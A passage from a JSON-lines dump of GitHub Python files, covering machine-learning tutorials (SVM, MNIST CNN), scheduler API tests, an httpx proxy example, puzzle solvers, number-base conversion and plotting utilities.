np.linspace(-2, 2))\r\n y_proba = clf.predict_proba(np.hstack((X1.reshape(-1, 1), X2.reshape(-1, 1))))[:, 1]\r\n plt.contourf(X1, X2, y_proba.reshape(50, 50), 16, cmap=plt.cm.bwr, alpha=0.75)\r\n plt.colorbar()\r\n\r\n accuracy = clf.score(X_test, y_test)\r\n plt.scatter(X_train[:, 0], X_train[:, 1], c=y_train, edgecolors='white', cmap=plt.cm.bwr)\r\n plt.xlabel('$x_1$')\r\n plt.ylabel('$x_2$')\r\n plt.title('test set accuracy: {}'.format(accuracy));\r\n\r\n return plotter\r\n\r\n\r\nfrom sklearn.datasets import make_moons\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nX, y = make_moons(400, noise=0.25, random_state=0)\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, random_state=0)\r\n\r\nlog_C_slider = FloatSlider(min=-4, max=4, step=0.25, value=0, description='$\\log(C)$')\r\nlog_gamma_slider = FloatSlider(min=-3, max=2, step=0.01, value=0, description='$\\log(\\gamma$)')\r\ndeg_slider = IntSlider(min=1, max=4, step=1, value=2, description='$d$')\r\ncoef0_slider = FloatSlider(min=-100, max=100, step=0.1, value=0, description='$r$')\r\n\r\ninteract(plot_decision_boundary(X_train, X_test, y_train, y_test),\r\n log_C=log_C_slider,\r\n log_gamma=log_gamma_slider, \r\n kernel=['rbf', 'linear', 'sigmoid', 'poly'],\r\n deg=deg_slider,\r\n coef0=coef0_slider);\r\n\r\n#%%\r\n#=====================================\r\n# COMPARISON WITH LOGISTIC REGRESSION\r\n#=====================================\r\n\r\nx = np.linspace(-6, 4, 100)\r\nhinge_loss = lambda x: -(x-1) if x < 1 else 0\r\nlog_loss = np.log(1+np.exp(-x))\r\n\r\nplt.plot(x, list(map(hinge_loss, x)))\r\nplt.plot(x, log_loss, '--r')\r\nplt.xlabel(\"$y(x \\cdot \\\\beta + \\\\beta_0)$\")\r\nplt.ylabel('loss');\r\n\r\n#%%\r\n\r\n\r\n\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\ndef plot_svc_vs_lr(cluster_std=0.8, log_C=1, model='logistic regression', outlier=False):\r\n X, y = make_blobs(centers=[[1, 1], [-1, -1]], cluster_std=cluster_std, random_state=0)\r\n\r\n if outlier:\r\n X = np.vstack((X, [-1.5, 0.]))\r\n y = np.hstack((y, [0]))\r\n\r\n name_to_clf = {'logistic regression': LogisticRegression(C=10**log_C, solver='lbfgs'),\r\n 'SVM': svm.SVC(C=10**log_C, kernel='linear')}\r\n \r\n clf = name_to_clf[model]\r\n clf.fit(X, y)\r\n \r\n beta = clf.coef_[0]\r\n beta_0 = clf.intercept_\r\n slope = -beta[0]/beta[1]\r\n intercept = -beta_0/beta[1]\r\n \r\n x_max = np.ceil(np.abs(X).max())\r\n x = np.linspace(-x_max, x_max, 100)\r\n\r\n plt.plot(x, slope*x + intercept, 'k')\r\n plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.bwr)\r\n plt.axis([-x_max, x_max, -x_max, x_max])\r\n \r\n#%% \r\nlog_C_slider = FloatSlider(min=-4, max=4, step=0.25, value=1, description='$\\log(C)$')\r\ncluster_std_slider = FloatSlider(min=0.2, max=1.0, step=0.05, value=0.8, description='cluster $\\sigma$')\r\n\r\ninteract(plot_svc_vs_lr,\r\n cluster_std=cluster_std_slider,\r\n log_C=log_C_slider,\r\n model=['logistic regression', 'SVM']);\r\n\r\n#%%\r\n#====================\r\n# SVM FOR REGRESSION\r\n#====================\r\n\r\neps = 0.25\r\nx = np.linspace(-1, 1, 100)\r\nwell_loss = list(map(lambda x: abs(x)-eps if abs(x) > eps else 0, x))\r\nsquare_loss = x**2\r\n\r\nplt.plot(x, well_loss)\r\nplt.plot(x, square_loss)\r\nplt.xlabel('distance from the center')\r\nplt.ylabel('loss')\r\nplt.legend(['well loss', 'square loss']);\r\n\r\n#%%\r\n\r\ndef plot_svr_interact(X, y):\r\n def plotter(epsilon=0.5, log_C=2):\r\n rgr = svm.SVR(kernel='linear', epsilon=epsilon, C=10**log_C)\r\n rgr.fit(X, y)\r\n \r\n y_pred = rgr.predict(X)\r\n ind = np.abs(y - y_pred) >= epsilon\r\n\r\n plt.scatter(X[ind], y[ind], s=100, color='y')\r\n plt.scatter(X, y)\r\n plt.fill_between(X.reshape(-1,), y_pred - epsilon, y_pred + epsilon, alpha=0.25, color='k', linewidth=0)\r\n plt.plot(X, y_pred, '-k')\r\n plt.xlabel('$x$')\r\n plt.ylabel('$y$')\r\n\r\n return plotter\r\n\r\n#%%\r\n\r\nnp.random.seed(0)\r\nx = np.linspace(-1, 1, 100)\r\ny = 2*x + 1 + 0.5*np.random.randn(100)\r\n\r\nlog_C_slider = FloatSlider(min=-3, max=1, step=0.05, value=-1, description='$\\log(C)$')\r\nepsilon_slider = FloatSlider(min=0.05, max=2, step=0.05, value=0.5, description='$\\epsilon$')\r\ninteract(plot_svr_interact(x.reshape(-1, 1), y), log_C=log_C_slider, epsilon=epsilon_slider);\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"FankaRoy/Machine-Learning","sub_path":"ML_Support_Vector_Machines_.py","file_name":"ML_Support_Vector_Machines_.py","file_ext":"py","file_size_in_byte":8370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32625983194","text":"import argparse\n\ndef display_args(args):\n print(args)\n print(f'arg1 : {args.arg1}')\n print(f'arg2 : {args.arg2}')\n \n return 0\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(#\"-短縮ver\", \n \"--arg1\", \n help=\"arg1_description\", \n #type=bool, \n default=False)\n\nparser.add_argument(#\"-短縮ver\", \n \"--arg2\", \n help=\"arg2_description\", \n #type=bool, \n default=False)\n\nargs = parser.parse_args()\n\nprint(args.arg1)\n\nprint(args.arg2)\n\nprint(args)\n\nprint(\"==== Function ====\")\n\ndisplay_args(args)\n\n","repo_name":"betashort/ClassActivationMappings","sub_path":"args_test.py","file_name":"args_test.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1481945806","text":"# -*- encoding: utf-8 -*-\n'''\n@Time : 2021-03-01\n@Author : EvilRecluse\n@Contact : https://github.com/RecluseXU\n@Desc : 使用代理\n'''\n\n# here put the import lib\nimport httpx\n\n\ndef proxy_base():\n \"\"\" 代理的基础使用方法\n \"\"\"\n proxies = {\n \"http://\": \"http://localhost:8030\",\n \"https://\": \"http://localhost:8031\",\n }\n\n with httpx.Client(proxies=proxies) as client:\n resp = client.get(\"http://httpbin.org/ip\")\n print(resp.json())\n\n\ndef proxy_route():\n \"\"\" 代理路由, 根据访问的url选择不同的代理进行使用\n \"\"\"\n proxies = {\n # 让所有请求都走这个代理\n \"all://example.com\": \"http://localhost:8030\",\n # 根据请求协议类型走不同的代理\n \"http://\": \"http://localhost:8030\",\n \"https://\": \"http://localhost:8031\",\n # 指定url走不同的代理\n \"all://example.com\": \"http://localhost:8030\",\n # 指定域名走不同的代理\n \"all://*example.com\": \"http://localhost:8030\",\n # 指定子域名走不同代理\n \"all://*.example.com\": \"http://localhost:8030\",\n # 指定端口走不同代理\n \"https://example.com:1234\": \"http://localhost:8030\",\n # 不走代理\n \"http://example.com/a\": None,\n }\n with httpx.Client(proxies=proxies) as client:\n resp = client.get(\"http://httpbin.org/ip\")\n print(resp.json())\n\n\ndef proxy_type():\n \"\"\" 检查代理类型\n \"\"\"\n proxies = httpx.Proxy(\n url=\"https://localhost:8030\",\n mode=\"TUNNEL_ONLY\", # 这个代理必须是隧道类型\n )\n\n with httpx.Client(proxies=proxies) as client:\n # This HTTP request will be tunneled instead of forwarded\n resp = client.get(\"http://example.com\")\n print(resp.url)\n\n\nproxy_base()\nproxy_route()\n","repo_name":"RecluseXU/learning_spider","sub_path":"example/0_Basic_usage_of_the_library/python_httpx/3_5_proxy.py","file_name":"3_5_proxy.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"32"} +{"seq_id":"23690002173","text":"from collections import defaultdict\nfrom itertools import islice, count\nfrom math import sqrt\nfrom queue import Queue\n\nfrom shared.Util import timed\n\n\n@timed\ndef read():\n file_name = f'input{input(\"Input file #: \")}.txt'\n with open(file_name) as input_file:\n return [(op, list(map(lambda y: int(y) if y[-1].isdigit() else y, args))) for op, *args in map(lambda line: line.rstrip().split(), input_file.readlines())]\n\n\ndef run_instruction(instructions, pointer, registers, send_queue: Queue, receive_queue: Queue):\n op, args = instructions[pointer]\n if op == 'snd':\n a, = args\n send_queue.put(registers[a])\n pointer += 1\n elif op == 'set':\n a, b = args\n registers[a] = b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'add':\n a, b = args\n registers[a] += b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'sub':\n a, b = args\n registers[a] -= b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'mul':\n a, b = args\n registers[a] *= b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'mod':\n a, b = args\n registers[a] %= b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'rcv':\n a, = args\n if not receive_queue.empty():\n registers[a] = receive_queue.get()\n pointer += 1\n elif op == 'jgz':\n a, b = args\n c = a if isinstance(a, int) else registers[a]\n pointer += (b if isinstance(b, int) else registers[b]) if c > 0 else 1\n elif op == 'jnz':\n a, b = args\n c = a if isinstance(a, int) else registers[a]\n pointer += (b if isinstance(b, int) else registers[b]) if c != 0 else 1\n\n return pointer\n\n\n@timed\ndef part1(instructions):\n registers = defaultdict(int)\n pointer = 0\n counter = 0\n while 0 <= pointer < len(instructions):\n op, _ = instructions[pointer]\n if op == 'mul':\n counter += 1\n pointer = run_instruction(instructions, pointer, registers, None, None)\n\n print(counter)\n\n\ndef is_prime(n):\n return all(n % i for i in islice(count(2), int(sqrt(n) - 1)))\n\n\n@timed\ndef part2(instructions):\n print(len(list(filter(lambda num: not is_prime(num), range(106700, 123701, 17)))))\n print(sum(1 for num in range(106700, 123701, 17) if not is_prime(num)))\n\n\nif __name__ == '__main__':\n instruction_list = read()\n part1(instruction_list)\n part2(instruction_list)\n","repo_name":"TumuGuskun/aoc","sub_path":"aoc-2017/day23/Day23.py","file_name":"Day23.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10195878004","text":"import pytest\nfrom rocketry.conds import scheduler_cycles\nfrom rocketry import Rocketry\n\nfrom subsystems.apps import AutoAPI\nfrom fastapi.testclient import TestClient\n\ndef do_success():\n ...\n\n@pytest.fixture()\ndef scheduler():\n app = Rocketry()\n app.params(myparam=\"hello\")\n app.task(start_cond=\"every 10 seconds\", func=do_success, name=\"do_short\")\n app.task(start_cond=\"every 10 seconds\", func=do_success, name=\"do_stuff\")\n app.task(start_cond=\"every 10 seconds\", func=do_success, name=\"do_things\")\n return app\n\n@pytest.fixture()\ndef api(scheduler):\n app = AutoAPI(scheduler=scheduler)\n return app\n\n@pytest.fixture()\ndef client(api):\n return TestClient(api)\n\ndef test_get_tasks(client):\n response = client.get(\"/tasks\")\n assert response.status_code == 200\n\n body = response.json()\n assert isinstance(body, list)\n assert len(body) > 0\n\ndef test_get_config(client):\n response = client.get(\"/session/config\")\n assert response.status_code == 200\n\n body = response.json()\n assert isinstance(body, dict)\n assert set(body.keys()) >= {\"task_priority\", \"task_priority\", \"multilaunch\", \"timeout\", \"shut_cond\", \"cycle_sleep\"}\n\ndef test_get_params(client):\n response = client.get(\"/session/parameters\")\n assert response.status_code == 200\n\n body = response.json()\n assert body == {\"myparam\": \"hello\"}\n\ndef test_post_task_run(client):\n resp = client.get(\"/tasks/do_short\")\n assert resp.status_code == 200\n assert not resp.json()[\"set_running\"]\n\n response = client.post(\"/tasks/do_short/run\")\n assert response.status_code == 200\n\n assert client.get(\"/tasks/do_short\").json()[\"set_running\"]\n\ndef test_post_task_disable_enable(client):\n assert not client.get(\"/tasks/do_short\").json()[\"disabled\"]\n\n for _ in range(2):\n response = client.post(\"/tasks/do_short/disable\")\n assert response.status_code == 200\n assert client.get(\"/tasks/do_short\").json()[\"disabled\"]\n\n for _ in range(2):\n response = client.post(\"/tasks/do_short/enable\")\n assert response.status_code == 200\n assert not client.get(\"/tasks/do_short\").json()[\"disabled\"]\n\ndef test_get_logs(scheduler, client):\n scheduler.session.config.shut_cond = scheduler_cycles(1)\n scheduler.session.config.instant_shutdown = True\n scheduler.run()\n response = client.get(\"/logs\")\n assert response.status_code == 200\n\n body = response.json()\n assert isinstance(body, list)\n assert len(body) > 3","repo_name":"Miksus/subsystems","sub_path":"subsystems/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10715384355","text":"# import turtle\n#\n# #create an object of class Turtle\n# my_turtle = turtle.Turtle()\n# print(my_turtle)\n# my_turtle.shape(\"turtle\")\n# my_turtle.color(\"green\")\n# my_turtle.home()\n# my_turtle.forward(30)\n# #create object for screen\n# my_screen = turtle.Screen()\n# print(my_screen.canvheight)\n# my_screen.bgcolor(\"pink\")\n# my_screen.exitonclick()\n# print(my_turtle.color)\n\n\n#get the color of turtle changed\nimport prettytable\n#from prettytable import PrettyTable\nmy_table = prettytable.PrettyTable()\n\nmy_table.add_column(\"Pokemon\",[\"Picachu\",\"Squirtle\",\"Charmander\"])\nmy_table.add_column(\"Type\",[\"Electric\",\"Water\",\"Fire\"])\nmy_table.align = \"l\"\nprint(my_table)","repo_name":"sakumv/PyCharmProjects","sub_path":"turtleProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12473422996","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\n\nfrom ui.config import uiConfig\nfrom ui.CustomSelectRegionTableWidget import CustomSelectRegionTableWidget\n\nclass ToolsContainer(QFrame):\n\n showInfoSig = pyqtSignal()\n\n updateImageShownLayoutSignal = pyqtSignal(tuple)\n\n def __init__(self, ParentWidget):\n QFrame.__init__(self, ParentWidget)\n\n self.setGeometry(uiConfig.calcToolsContainerGeometry())\n print(\"ToolsContainer Geometry:\")\n print(self.geometry())\n self.setFrameShape(QFrame.StyledPanel)\n self.setFrameShadow(QFrame.Plain)\n self.setObjectName(\"toolsContainer\")\n\n #功能1\n #一个可选择的表格,来调整文件渲染区的布局\n self.selectImageShownRegionTableWidget = CustomSelectRegionTableWidget()\n self.selectImageShownRegionTableWidget.setParent(self)\n\n #用来测试各个功能的button\n self.testButton = QPushButton(self)\n self.testButton.setGeometry(0, self.selectImageShownRegionTableWidget.height(), 100, 30)\n self.testButton.clicked.connect(self.updateImageShownLayoutSignalHandler)\n\n #用来展示信息的button\n self.pushButton = QPushButton(self)\n self.pushButton.setGeometry(0, self.selectImageShownRegionTableWidget.height() + self.testButton.height(), 100, 30)\n self.pushButton.clicked.connect(self.showInfoSig)\n #\n # self.verticalLayoutWidget = QtWidgets.QWidget(self)\n # self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 200, 1600))\n # self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n # self.toolsVerticalContainer = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n # self.toolsVerticalContainer.setContentsMargins(0, 0, 0, 0)\n # self.toolsVerticalContainer.setObjectName(\"toolsVerticalContainer\")\n #\n # self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\n # self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n # spacerItem = QtWidgets.QSpacerItem(40, 20)\n # self.horizontalLayout_2.addItem(spacerItem)\n #\n # spacerItem1 = QtWidgets.QSpacerItem(40, 20)\n # self.horizontalLayout_2.addItem(spacerItem1)\n # self.pushButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n # self.pushButton.setObjectName(\"pushButton\")\n # self.horizontalLayout_2.addWidget(self.pushButton)\n # spacerItem2 = QtWidgets.QSpacerItem(40, 20)\n # self.horizontalLayout_2.addItem(spacerItem2)\n # self.toolsVerticalContainer.addLayout(self.horizontalLayout_2)\n #\n # self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n # self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n # spacerItem3 = QtWidgets.QSpacerItem(40, 20)\n # self.horizontalLayout_3.addItem(spacerItem3)\n #\n # spacerItem4 = QtWidgets.QSpacerItem(40, 20)\n # self.horizontalLayout_3.addItem(spacerItem4)\n # self.pushButton_2 = QtWidgets.QPushButton(self.verticalLayoutWidget)\n # self.pushButton_2.setObjectName(\"pushButton_2\")\n # self.horizontalLayout_3.addWidget(self.pushButton_2)\n # spacerItem5 = QtWidgets.QSpacerItem(40, 20)\n # self.horizontalLayout_3.addItem(spacerItem5)\n # self.toolsVerticalContainer.addLayout(self.horizontalLayout_3)\n #\n # self.horizontalLayout = QtWidgets.QHBoxLayout()\n # self.horizontalLayout.setObjectName(\"horizontalLayout\")\n # spacerItem6 = QtWidgets.QSpacerItem(40, 20)\n # self.horizontalLayout.addItem(spacerItem6)\n #\n # spacerItem7 = QtWidgets.QSpacerItem(40, 20)\n # self.horizontalLayout.addItem(spacerItem7)\n # self.pushButton_3 = QtWidgets.QPushButton(self.verticalLayoutWidget)\n # self.pushButton_3.setObjectName(\"pushButton_3\")\n # self.horizontalLayout.addWidget(self.pushButton_3)\n # spacerItem8 = QtWidgets.QSpacerItem(40, 20)\n # self.horizontalLayout.addItem(spacerItem8)\n # self.toolsVerticalContainer.addLayout(self.horizontalLayout)\n #\n # # self.pushButton.clicked.connect(self.showInfoSig)\n #\n\n def updateImageShownLayoutSignalHandler(self):\n if len(self.selectImageShownRegionTableWidget.selectedRanges()) < 1:\n return\n selectedRegion = self.selectImageShownRegionTableWidget.selectedRanges()[0]\n layout = (\n selectedRegion.topRow(),\n selectedRegion.leftColumn(),\n selectedRegion.bottomRow(),\n selectedRegion.rightColumn()\n )\n print(\"确认布局\", layout)\n self.updateImageShownLayoutSignal.emit(layout)\n\n\n def retranslateUi(self):\n _translate = QCoreApplication.translate\n self.pushButton.setText(_translate(\"MainWindow\", \"展示信息\"))\n # self.pushButton_2.setText(_translate(\"MainWindow\", \"功能2\"))\n # self.pushButton_3.setText(_translate(\"MainWindow\", \"功能3\"))\n self.testButton.setText(_translate(\"MainWindow\", \"确认布局\"))","repo_name":"evermg42/MRViewer","sub_path":"ui/ToolsContainer.py","file_name":"ToolsContainer.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18260167315","text":"#!/usr/bin/env python\n\n# This creates a Convolutinal Neural Network using Pytorch to detect\n# the hand-written characters from the MNIST dataset.\n#\n# The work is based on work by Arijit Mukherjee: https://www.youtube.com/watch?v=kI3F8lLNneM\n# The original code does not mention a license. Since it is publicly available I assume it is\n# fair to use like this. If not, let me know.\n# The framework code is mostly unmodified, the network itself is changed to be 8-bit friendly\n\nimport torch, torchvision\nfrom torch import nn,optim\nfrom torch.autograd import Variable as var\n\n\nn_batch= 128\nlearning_rate = 0.0005\nn_epoch = 20\nn_print = 50\nresize_to = 14\ndevice = \"cuda:0\"\n\n# A custom transform to binarize the input data.\n# The demo device touch screen is not really sensitive enough\n# to give more than binary touch data, so this makes the MNIST data\n# look more like what the code on the AVR sees\nclass Binarize(object):\n def __call__(self, img):\n img[img < 0.3]=0\n img[img >= 0.3]=1\n return img\n# Stack up all transforms performed on each input image. These augment the dataset nicely.\n# Output is a 14x14x1 pixel image.\nT = torchvision.transforms.Compose([torchvision.transforms.ToTensor(),\n torchvision.transforms.RandomRotation(15),\n torchvision.transforms.Resize(resize_to+2),\n torchvision.transforms.RandomCrop(resize_to),\n Binarize()\n ])\n\ntrain_data = torchvision.datasets.MNIST('data',train=True,download=True,transform=T)\nval_data = torchvision.datasets.MNIST('data',train=False,download=True,transform=T)\n\ntrain_dl = torch.utils.data.DataLoader(train_data,batch_size = n_batch)\nval_dl = torch.utils.data.DataLoader(val_data,batch_size = n_batch)\n\n\n## If you want to have a look at the input\n#import matplotlib.pyplot as plt\n#dataiter = iter(train_dl)\n#images, labels = dataiter.next()\n#print(images.shape)\n#print(labels.shape)\n#plt.imshow(images[12].numpy().squeeze(), cmap='Greys_r')\n\n\n#### Part II : Writing the Network\nclass myCNN(nn.Module):\n def __init__(self):\n super(myCNN,self).__init__()\n # input: 1 x 14 x 14\n # Conv2d( input_channels, output_channels, kernel_size)\n self.cnn1 = nn.Conv2d(1,20, 5, stride=2, bias=False)\n # 20 x 5 x 5\n self.cnn2 = nn.Conv2d(20,12,3, stride=1, bias=False)\n # 12 x 3 x 3\n\n self.linear = nn.Linear(12*3*3,10)\n self.relu = nn.ReLU()\n\n def forward(self,x):\n n = x.size(0)\n x = self.relu(self.cnn1(x))\n x = self.cnn2(x)\n x = x.view(n,-1)\n x = self.linear(x)\n return x\n\n\n#### Part III : Writing the main Training loop\n\nmycnn = myCNN().cuda()\ncec = nn.CrossEntropyLoss()\noptimizer = optim.Adam(mycnn.parameters(),lr = learning_rate)\n\ndef validate(model,data):\n # To get validation accuracy = (correct/total)*100.\n total = 0\n correct = 0\n for i,(images,labels) in enumerate(data):\n images = var(images.cuda())\n x = model(images)\n value,pred = torch.max(x,1)\n pred = pred.data.cpu()\n total += x.size(0)\n correct += torch.sum(pred == labels)\n return correct*100./total\n\nfor e in range(n_epoch):\n for i,(images,labels) in enumerate(train_dl):\n images = var(images.cuda())\n labels = var(labels.cuda())\n optimizer.zero_grad()\n pred = mycnn(images)\n loss = cec(pred,labels)\n loss.backward()\n optimizer.step()\n if (i+1) % n_print == 0:\n accuracy = float(validate(mycnn,val_dl))\n print('Epoch :',e+1,'Batch :',i+1,'Loss :',float(loss.data),'Accuracy :',accuracy,'%')\n\n\n# Save the trained model as ONNX\ninput_names = [ \"network_input\" ]\noutput_names = [ \"network_output\" ]\ndummy_input = torch.randn(1, 1, resize_to, resize_to).cuda()\ntorch.onnx.export(mycnn, dummy_input, \"mnist.onnx\", input_names=input_names, output_names=output_names)\n\n","repo_name":"kraiskil/onnx2c","sub_path":"examples/atmega_mnist/create_network.py","file_name":"create_network.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"32"} +{"seq_id":"6370835295","text":"hexa = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n\n\ndef decimal_para_base(valor: str, base: int):\n # convertendo a parte inteira (divisões sucessivas)\n valor_inteiro = int(valor.split(\".\")[0])\n\n restos = []\n\n if valor_inteiro == 0:\n restos.append(0)\n\n while valor_inteiro > 0:\n restos.append(valor_inteiro % base)\n valor_inteiro = int(valor_inteiro / base)\n\n restos.reverse()\n\n restos_string_int = str()\n for i in restos:\n restos_string_int += hexa[i]\n\n # convertendo a parte fracionária (multiplicações sucessivas)\n valor_fracionario = float(valor) - int(valor.split(\".\")[0])\n\n continuar = True\n i = 0\n lista_convertido = []\n lista_restos = []\n lista_restos.append(valor_fracionario)\n\n while continuar:\n res = lista_restos[i] * base\n lista_restos.append(float(\"0.\" + str(res).split(\".\")[1]))\n lista_convertido.append(int(res))\n\n # verificar se o valor atual já está na lista de restos, sendo assim, é uma dízima\n for j in range(len(lista_restos) - 1):\n if lista_restos[j - 1] == lista_restos[i]:\n continuar = False\n\n # limitar a precisão do resultado\n if len(lista_restos) > 4:\n continuar = False\n\n i += 1\n\n restos_string_float = str()\n for i in lista_convertido:\n restos_string_float += hexa[i]\n\n resultado = f\"{restos_string_int}.{restos_string_float}\"\n\n return resultado\n","repo_name":"mateusfl/calculadora-bases","sub_path":"decimal_para_base.py","file_name":"decimal_para_base.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2961730950","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom objective_functions import gaussian_2d_old, gauss_2d\n\n\ndef plot_simple_data(agent, Xtest, ytest, title='Approximated Function', savefig=False):\n plt.figure(figsize=(13, 8))\n yhat = agent.feedforward(Xtest)\n # plt.plot(xtrain, ytrain, 'kx', label = 'Training Data')\n plt.plot(Xtest, ytest, 'bx', label='Test Data')\n plt.plot(Xtest, yhat, '-r', label='Learned Function')\n # plt.title(r'Fit of $y = x^2$', fontsize = 15)\n #plt.title(title, fontsize=26)\n plt.xlabel('x', fontsize=24)\n plt.ylabel('y', fontsize=24)\n plt.legend(fontsize=14)\n if savefig:\n plt.savefig(title, bbox_inches='tight', transparent=True)\n else:\n plt.show()\n\n\ndef prep_for_2d_mesh(agent, Xtest):\n x1, x2 = Xtest[:, 0], Xtest[:, 1]\n x1mesh, x2mesh = np.meshgrid(x1, x2)\n yhats = []\n xtest3d = []\n\n for x1_, x2_ in zip(x1mesh, x2mesh):\n xtest3d.append(np.column_stack([x1_, x2_]))\n\n for x in xtest3d:\n yhat = agent.feedforward(x)\n yhats.append(yhat.flatten())\n\n yhats = np.array(yhats)\n return yhats\n\n\ndef plot_ackley(func, agent, bounds=None, title='', savefig=False):\n if bounds is not None:\n lb, ub = bounds\n else:\n ub = abs(1.5 * agent[0])\n lb = -ub\n\n px, py = agent\n\n x_span = np.linspace(lb, ub, 50)\n y_span = np.linspace(lb, ub, 50)\n x, y = np.meshgrid(x_span, y_span)\n z = func([x, y]) # formula for parabola in 3D\n pz = func([px, py])\n\n plt.figure(figsize=(16, 10))\n ax = plt.axes(projection='3d')\n ax.scatter(px, py, pz, s=100, color='red');\n ax.plot_surface(x, y, z, cmap='viridis', alpha=0.75)\n # ax.plot_wireframe(x, y, z, cmap='viridis',zorder=1)\n ax.set_title(title, fontsize=26);\n ax.set_xlabel('x', fontsize=20)\n ax.set_ylabel('y', fontsize=20)\n ax.set_zlabel('z', fontsize=20)\n if savefig:\n plt.savefig(title, bbox_inches='tight', transparent=True)\n else:\n plt.show()\n\n\ndef plot_2d_gauss(agent, X=None, ytest=None, bounds=[-1, 1], mu=[0, 0], sigma=[0.25, 0.25], verbose=False, title=' ',\n savefig=False):\n\n y = prep_for_2d_mesh(agent, X)\n\n if X is None:\n x1 = np.linspace(bounds[0], bounds[1], 50)\n x2 = np.linspace(bounds[0], bounds[1], 50)\n x1, x2 = np.meshgrid(x1, x2)\n y = gaussian_2d_old([x1, x2], mu, sigma)\n elif X is not None:\n x1, x2 = X[:, 0], X[:, 1]\n x1, x2 = np.meshgrid(x1, x2)\n if y is None:\n y = gaussian_2d_old([x1, x2], mu, sigma)\n\n plt.figure(figsize=(16, 10))\n ax = plt.axes(projection='3d')\n ax.plot_surface(x1, x2, y, cmap='viridis', alpha=1)\n #ax.set_title(title, fontsize=26);\n ax.set_xlabel('x1', fontsize=20)\n ax.set_ylabel('x2', fontsize=20)\n ax.set_zlabel('y', fontsize=20)\n if savefig:\n plt.savefig(title, bbox_inches='tight', transparent=True)\n else:\n plt.show()","repo_name":"FaxMan1/Master-Thesis","sub_path":"visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20082510503","text":"import re\n\n# Map from a tag or attribute specification to a compiled regular expression\n# object. Used by the scopenavigator/2 method below for caching purposes.\n# In a multithreaded setting, we currently assume that locking takes place\n# externally. This may an assumption we have to revisit at a later stage.\n_regexpmap = {}\n\n# Precompile some regular expressions used for locating matches. Used by the\n# scopenavigator/2 method below.\n_tagregexp1 = re.compile(\"<\\s*([^!/\\s>]+)([^>]*)\\s*>\")\n_tagregexp2 = re.compile(\"\\s*([^\\s\\\"]+)\\s*=\\s*\\\"[^\\\"]*\\\"\")\n_tagregexp3 = re.compile(\"<\\s*([^!/\\s>]+)(?:\\s+\\w+\\s*=\\s*\\\"[^\\\"]*\\\")*\\s*/?\\s*>\")\n\n# Define the magic begin-of-highlighting and end-of-highlighting sequences. Note that\n# this must be synchronized with whatever term highlighting markup is specified in the\n# fsearch.addon configuration file.\n_junbohseq = chr(2)\n_juneohseq = chr(3)\n\n# Precompile some regular expressions used for locating matches. Used by the\n# internal _enclosingtags/2 method below.\n_junregexp1 = re.compile(_juneohseq)\n_junregexp2 = re.compile(\"<\\s*(/?[^!>\\s]+)(?:\\s+[^=]+\\s*=\\s*\\\"[^\\\"]*\\\")*\\s*>\")\n\n# Define the tags that should be ignored when reporting back matching scopes.\n# Used by the scopenavigator/2 method below. For those tags that are part of\n# the standard XML \"envelope\", this must be synchronized with those specified\n# in the fsearch.addon configuration file. For those tags that are actual\n# content tags but which are not of interest to report back, this must be\n# synchronized with the document processing pipeline configuration.\n_ignoretags = {\"matches\": 1,\n \"xpath\": 1,\n \"filter\": 1,\n \"error\": 1,\n \"match\": 1,\n \"sentence\": 2,\n \"paragraph\": 2,\n \"document\": 2,\n \"title\": 2,\n \"body\": 2}\n\n# Define a regular expression that can be used to strip away tags to yield\n# the original surface forms. Used by the scopenavigator/2 method below.\n_stripregexp = re.compile(\"|\".join([r\"(?:<[^!][^>]+>)\", r\"(?:)\", _junbohseq, _juneohseq]))\n\n# Map from a 3 character month name prefix to its number. Used by the isodate/2 method below.\n_monthmap_3c = {\"jan\": \"01\",\n \"ene\": 